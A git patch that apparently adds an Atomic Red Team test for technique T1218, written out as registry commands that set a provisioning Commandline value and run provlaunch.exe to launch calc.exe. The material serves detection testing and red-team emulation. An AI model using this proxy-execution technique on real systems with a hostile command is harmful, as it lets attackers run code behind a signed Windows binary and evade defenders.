From 2dc70561dd5b5ef20f1e58c4b6d4801751d0f7fc Mon Sep 17 00:00:00 2001
From: Tuutaans <69729332+Tuutaans@users.noreply.github.com>
Date: Fri, 29 Sep 2023 20:29:32 +0545
Subject: [PATCH] Provlaunch.exe Executes Arbitrary Command via Registry Key
 (#2546)

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
---
 atomics/T1218/T1218.yaml | 16 +++++++++++++++-
 1 file changed, 15 insertions(+), 1 deletion(-)

diff --git a/atomics/T1218/T1218.yaml b/atomics/T1218/T1218.yaml
index 9c2a5fc5..e00e82bd 100644
--- a/atomics/T1218/T1218.yaml
+++ b/atomics/T1218/T1218.yaml
@@ -349,4 +349,18 @@ atomic_tests:
     cleanup_command: | 
       Remove-Item -Path #{dest_path} -Recurse -Force
     name: powershell
-    elevation_required: true
\ No newline at end of file
+    elevation_required: true
+- name: Provlaunch.exe Executes Arbitrary Command via Registry Key
+  description: |
+    Provlaunch.exe executes a command defined in the Registry. This test will create the necessary registry keys and values, then run provlaunch.exe to execute an arbitrary command.
+    - https://twitter.com/0gtweet/status/1674399582162153472
+    - https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/
+    Registry keys are deleted after successful execution.
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg.exe add HKLM\SOFTWARE\Microsoft\Provisioning\Commands\LOLBin\dummy1 /v altitude /t REG_DWORD /d 0
+      reg add HKLM\SOFTWARE\Microsoft\Provisioning\Commands\LOLBin\dummy1\dummy2 /v Commandline /d calc.exe
+      c:\windows\system32\provlaunch.exe LOLBin
+    name: command_prompt
\ No newline at end of file